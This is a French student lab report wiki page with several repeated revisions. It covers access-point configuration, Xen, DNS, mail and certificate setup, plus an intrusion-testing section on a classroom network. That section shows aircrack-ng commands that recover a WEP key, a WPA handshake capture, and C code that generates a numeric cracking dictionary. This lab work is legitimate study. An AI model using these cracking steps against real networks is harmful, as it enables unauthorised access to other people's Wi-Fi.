0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>c) Cassage d'une cles WPA</h2><br />
<br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
- creation d'un dictionaire :<br />
code C:<br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23127
TP sysres IMA2a5 2015/2016 G3
2015-11-22T17:32:10Z
<p>Mstrunc : </p>
<hr />
<div>Projet Système & Réseaux IMA2A S9 <br />
<br /><br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<h2>a) Préparation </h2><br />
- Instalation aircrack-ng<br />
<pre><br />
<br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>b) Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>c) Cassage d'une cles WPA</h2><br />
<br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
- creation d'un dictionaire :<br />
code C:<br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23126
TP sysres IMA2a5 2015/2016 G3
2015-11-22T17:26:45Z
<p>Mstrunc : </p>
<hr />
<div>Projet Système & Réseaux IMA2A S9 <br />
<br /><br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>a) Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3> 1) Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3> 1) Configuration du Wifi sur l'eeePC </h3><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<h2>a) Préparation </h2><br />
- Instalation aircrack-ng<br />
<pre><br />
<br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>b) Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
